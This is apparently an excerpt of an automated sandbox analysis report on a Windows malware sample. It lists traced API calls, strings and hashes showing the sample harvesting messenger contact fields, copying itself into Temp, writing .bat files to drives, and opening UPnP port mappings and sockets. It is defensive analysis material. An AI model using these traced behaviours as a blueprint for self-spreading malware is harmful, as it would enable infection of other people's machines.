                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,FULLNAME,?,00000000,?,0045B918,0041EFAB,0045B91D), ref: 0041E29A
                                                                                                                                                                                                                                                        • Part of subcall function 0041E1DC: lstrlenA.KERNEL32(0045B918,00000000,0041EFAB,0041E283,0041EFAB,?,00000000,?,0045B918,0041EFAB,0045B91D), ref: 0041E1E7
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,BIRTHDAY,?,00000000,?,0045B918,0041EFAB,0045B91D), ref: 0041E2AE
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,SEX,?,00000000,?,0045B918,0041EFAB,0045B91D), ref: 0041E2C2
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000001,NROF_AUTHED_BUDDIES,?,00000000,?,0045B918,0041EFAB,0045B91D), ref: 0041E4D5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmp$lstrlen
                                                                                                                                                                                                                                                      • String ID: ABOUT$AWAY$BIRTHDAY$BUDDYSTATUS$CITY$COUNTRY$DND$FULLNAME$HOMEPAGE$ISAUTHORIZED$ISBLOCKED$IS_VIDEO_CAPABLE$IS_VOICEMAIL_CAPABLE$LANGUAGE$MOOD_TEXT$NROF_AUTHED_BUDDIES$OFFLINE$ONLINE$ONLINESTATUS$PHONE_HOME$PHONE_MOBILE$PHONE_OFFICE$SEX$UNKNOWN
                                                                                                                                                                                                                                                      • API String ID: 1796421272-2537570566
                                                                                                                                                                                                                                                      • Opcode ID: b828d17df0a53081407dfd3d61c0ad278200320d67d3b5275ee632f44770f880
                                                                                                                                                                                                                                                      • Instruction ID: ae483a099041e121b577d559023c1734151ade630782458bd69102cbe1f60af0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b828d17df0a53081407dfd3d61c0ad278200320d67d3b5275ee632f44770f880
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A661B2797493AAB5E72019331E45BFB1E8C5F21788BA84057FC0592286F76CD4D242FE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00401FEE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 004020C4
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004020D2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000007), ref: 004020DD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004020FE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00402129
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402136
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00402144
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402152
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?,00000000), ref: 00402176
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004021C6
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004021DD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004021E6
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402207
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00402215
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00402223
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402230
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.rar), ref: 0040223E
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 00402247
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 0040225C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 00402278
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 004022B0
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004022D3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040230D
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402333
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00402350
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000), ref: 0040238D
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402396
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004023CC
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 004023E2
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 004023EF
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00459550,?,?,00000000), ref: 00402420
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00402451
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$lstrcat$Sleep$lstrcpy$Attributes$CloseCopyDeleteHandlelstrlen$CreateExecuteShellWritewsprintf
                                                                                                                                                                                                                                                      • String ID: .exe$.rar$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\mjvsikbqngeunkjyurda\$C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$a "..\%s.rar" * $tmp
                                                                                                                                                                                                                                                      • API String ID: 1896541782-2164101580
                                                                                                                                                                                                                                                      • Opcode ID: a66ae4b6b332cfed5fc7a961c17a4407ea6aa7cc5e1f26f7e44e15efcff0d816
                                                                                                                                                                                                                                                      • Instruction ID: 3022652ca617998f224523417b6a8ac86932b041dbb7c5d2648501ab9886e0b1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a66ae4b6b332cfed5fc7a961c17a4407ea6aa7cc5e1f26f7e44e15efcff0d816
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07C1E071940348EBDF21EBE0DD89ADA7B6CAB05304F4044BBE504A7191E6BD5A8DCF29
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00459868,76AE8A60,00000000,?,00417010,AddPortMapping,?,?), ref: 00416C88
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00417010,AddPortMapping,?,?), ref: 00416CC5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • HTTP/1.1HOST: , xrefs: 00416DA2
                                                                                                                                                                                                                                                      • > </s:Body></s:Envelope>, xrefs: 00416D76
                                                                                                                                                                                                                                                      • POST , xrefs: 00416D84
                                                                                                                                                                                                                                                      • ", xrefs: 00416E2F
                                                                                                                                                                                                                                                      • xmlns:u=", xrefs: 00416D25
                                                                                                                                                                                                                                                      • s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:, xrefs: 00416D0B
                                                                                                                                                                                                                                                      • </u:, xrefs: 00416D5C
                                                                                                                                                                                                                                                      • Content-Type: text/xml; charset="utf-8"SOAPAction: ", xrefs: 00416DFD
                                                                                                                                                                                                                                                      • <?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" , xrefs: 00416CFD
                                                                                                                                                                                                                                                      • ">, xrefs: 00416D42
                                                                                                                                                                                                                                                      • Content-Length: , xrefs: 00416DC0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                      • String ID: Content-Length: $Content-Type: text/xml; charset="utf-8"SOAPAction: "$ </u:$ HTTP/1.1HOST: $ xmlns:u="$"$">$<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" $> </s:Body></s:Envelope>$POST $s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:
                                                                                                                                                                                                                                                      • API String ID: 1659193697-2294304887
                                                                                                                                                                                                                                                      • Opcode ID: c8d16eee7a0d88e757d38f19f1d704b13cbca22e21eae0bd058f0f21d0ae4159
                                                                                                                                                                                                                                                      • Instruction ID: 7b3baf382d71d715a22e5296741040421d155ac39f68479bf3baede08e0e3f2e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8d16eee7a0d88e757d38f19f1d704b13cbca22e21eae0bd058f0f21d0ae4159
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A651FFB6D4023CA6DB21DBA2DD44ECB7BAC9B04254F5005D3B708E3040EA78DB588FA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040EA9F: lstrlenA.KERNEL32(?,?), ref: 0040EB2B
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040FB65
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(?), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040FB83
                                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0040FB96
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040FBD0
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 0040FBE3
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 0040FBF4
                                                                                                                                                                                                                                                      • select.WS2_32(?,?,00000000,00000000,?), ref: 0040FC3E
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040FC4E
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 0040FC6C
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,jan), ref: 0040FD59
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,feb), ref: 0040FD6E
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,mar), ref: 0040FD83
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000001,apr), ref: 0040FD98
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040FEB9
                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 0040FF99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmpi$closesocketlstrlen$connectgethostbynamehtonsinet_addrrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: apr$aug$date$dec$feb$jan$jul$jun$mar$may$nov$oct$sep
                                                                                                                                                                                                                                                      • API String ID: 4061257364-2825898416
                                                                                                                                                                                                                                                      • Opcode ID: a18311e5c731aebbf38475baf1635ccf958f722417b5ed2d110cee199ec65c7a
                                                                                                                                                                                                                                                      • Instruction ID: b440cbbe22d014a8756bf6f11b7a8553ac34d49057fa62a6aabe9826c51b07e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a18311e5c731aebbf38475baf1635ccf958f722417b5ed2d110cee199ec65c7a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95D14B3160435A9ADB315A259C44BBF37A89F16344F68007BFD05F26D3EA7CC84A876E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 00407E11
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00407E3E
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00407E59
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,0000000A), ref: 00407E68
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00407E8A
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00407EA1
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00407EBF
                                                                                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(000003FF,?), ref: 00407ED8
                                                                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(00000000), ref: 00407EF2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00407F58
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407FB2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 00407FED
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 00408015
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.bat), ref: 0040803D
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040804F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004080A9
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,0000001F), ref: 00408121
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,0000001F), ref: 00408130
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,0000001F), ref: 0040814E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0000001F), ref: 0040816C
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,0000001F), ref: 00408187
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408254
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040826A
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000), ref: 0040827B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00408284
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: GetTickCount.KERNEL32 ref: 00413AB3
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: GetSystemTime.KERNEL32(?), ref: 00413AC4
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413AFD
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B40
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B8E
                                                                                                                                                                                                                                                        • Part of subcall function 00413AAC: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 00413BA5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0040807C
                                                                                                                                                                                                                                                        • Part of subcall function 00414D8E: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000007), ref: 004082AD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004082B4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32 ref: 004082F7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040830C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Timelstrcat$lstrlen$CreateSleepSystemlstrcpy$AttributesCountDriveTick$CloseHandleLogicalStringsTypeWritewsprintf
                                                                                                                                                                                                                                                      • String ID: .bat$.exe$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\
                                                                                                                                                                                                                                                      • API String ID: 530435527-4043645035
                                                                                                                                                                                                                                                      • Opcode ID: 1c9aa11be561838a43ae379175575fc0f3b474eaa967c09e3932d09641773631
                                                                                                                                                                                                                                                      • Instruction ID: c6ce981036597e7e3b7541c0c98113c6be5eba37bc76b6932f84717924a43464
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c9aa11be561838a43ae379175575fc0f3b474eaa967c09e3932d09641773631
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11D1B8B2D0011CAADB25DBA0DC4AFEA77BDAB44314F5404ABF504E2181DA789F858F69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004157B9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 004157D3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00415816
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0041582D
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000080), ref: 0041584A
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 00415851
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,http://), ref: 00415886
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,:%d,?), ref: 004158B2
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004158BD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A7D8), ref: 004158CF
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000002), ref: 004158E8
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041592F
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,?,0000001E,?,?,?), ref: 00402FB3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(00000000,?,0000001E,?,?,?), ref: 00402FC3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,?,0000001E,?,?,?), ref: 00402FD3
                                                                                                                                                                                                                                                        • Part of subcall function 00402F35: lstrcpynA.KERNEL32(?,?,0000003E,?,?,?), ref: 00402FE3
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00415984
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20), ref: 004159B7
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetDesktopWindow.USER32 ref: 004152B8
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetWindowRect.USER32(00000000), ref: 004152C5
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: GetWindowRect.USER32(?,?), ref: 004152CF
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(?,00000001), ref: 0041532A
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetWindowPos.USER32(?,000000FF,?,00000000,00000258,000001F4,00000040), ref: 00415342
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(?,00000001), ref: 0041534B
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(?), ref: 00415358
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(?), ref: 00415361
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(?), ref: 00415364
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(?), ref: 00415367
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetForegroundWindow.USER32(?), ref: 0041536A
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: SetFocus.USER32(?), ref: 0041536D
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: Sleep.KERNEL32(00000064), ref: 00415371
                                                                                                                                                                                                                                                        • Part of subcall function 004152AB: ShowWindow.USER32(?,00000001), ref: 0041537A
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064), ref: 004154A0
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: SetFocus.USER32(?), ref: 004154B0
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064), ref: 004154B8
                                                                                                                                                                                                                                                        • Part of subcall function 00415497: Sleep.KERNEL32(00000064), ref: 004154C1
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(?), ref: 00415114
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(-00000005), ref: 00415209
                                                                                                                                                                                                                                                        • Part of subcall function 00415104: lstrlenA.KERNEL32(-00000005), ref: 00415211
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?), ref: 00415665
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?), ref: 0041566D
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrlenA.KERNEL32(?), ref: 004156C9
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrcatA.KERNEL32(?,0042A440), ref: 004156E0
                                                                                                                                                                                                                                                        • Part of subcall function 00415623: lstrcatA.KERNEL32(?,?), ref: 004156E7
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004159F9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 00415A04
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00415A09
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00415A89
